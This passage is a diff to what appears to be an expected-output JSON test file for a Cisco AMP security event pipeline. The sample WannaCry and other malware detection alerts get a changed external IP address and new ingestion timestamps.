"original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":193000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", + "ingested": "2021-12-09T13:35:55.388956100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":193000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1519,7 +1519,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1582,7 +1582,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1599,8 +1599,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965528958Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":853000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", + "ingested": "2021-12-09T13:35:55.388960200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":853000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1622,7 +1622,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1667,7 +1667,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1677,8 +1677,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965531032Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":884000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.388964700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":884000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -1698,7 +1698,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1731,7 +1731,7 @@ "Demo_AMP_MAP_FriedEx" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1741,8 +1741,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:15:43.965533117Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583853374897127000,\"timestamp\":1610624948,\"timestamp_nanoseconds\":562000000,\"date\":\"2021-01-14T11:49:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:55.388969800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583853374897127000,\"timestamp\":1610624948,\"timestamp_nanoseconds\":562000000,\"date\":\"2021-01-14T11:49:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -1759,7 +1759,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -1800,7 +1800,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1810,8 +1810,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965535211Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043963,\"timestamp\":1610624472,\"timestamp_nanoseconds\":496121997,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "ingested": "2021-12-09T13:35:55.388974600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043963,\"timestamp\":1610624472,\"timestamp_nanoseconds\":496121997,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1107296272", "kind": "alert", "start": "2021-01-14T11:41:12.000Z", @@ -1833,7 +1833,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1882,7 +1882,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1892,8 +1892,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965537386Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043964,\"timestamp\":1610624472,\"timestamp_nanoseconds\":498576872,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "ingested": "2021-12-09T13:35:55.388994900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043964,\"timestamp\":1610624472,\"timestamp_nanoseconds\":498576872,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1107296258", "kind": "alert", "start": "2021-01-14T11:41:12.000Z", @@ -1915,7 +1915,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1959,7 +1959,7 @@ "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1969,8 +1969,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965539415Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671599780921000,\"timestamp\":1610623726,\"timestamp_nanoseconds\":440000000,\"date\":\"2021-01-14T11:28:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\"}}}}", + "ingested": "2021-12-09T13:35:55.388998300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671599780921000,\"timestamp\":1610623726,\"timestamp_nanoseconds\":440000000,\"date\":\"2021-01-14T11:28:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\"}}}}", "code": "553648155", "kind": "alert", "action": "Retrospective Quarantine", @@ -1990,7 +1990,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2037,7 +2037,7 @@ "bdb11107a33eaeded6a838eb2a0e6167637dbe9c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2051,8 +2051,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965541431Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671595485954000,\"timestamp\":1610623725,\"timestamp_nanoseconds\":899000000,\"date\":\"2021-01-14T11:28:45+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.FCE5B6784D-100.SBX.TG\",\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"pp32.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\pp32.exe\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\",\"sha1\":\"bdb11107a33eaeded6a838eb2a0e6167637dbe9c\",\"md5\":\"5df0c4ebca109779dc8afc745d612637\"}}}}", + "ingested": "2021-12-09T13:35:55.389051900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671595485954000,\"timestamp\":1610623725,\"timestamp_nanoseconds\":899000000,\"date\":\"2021-01-14T11:28:45+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.FCE5B6784D-100.SBX.TG\",\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"pp32.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\pp32.exe\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\",\"sha1\":\"bdb11107a33eaeded6a838eb2a0e6167637dbe9c\",\"md5\":\"5df0c4ebca109779dc8afc745d612637\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -2074,7 +2074,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": 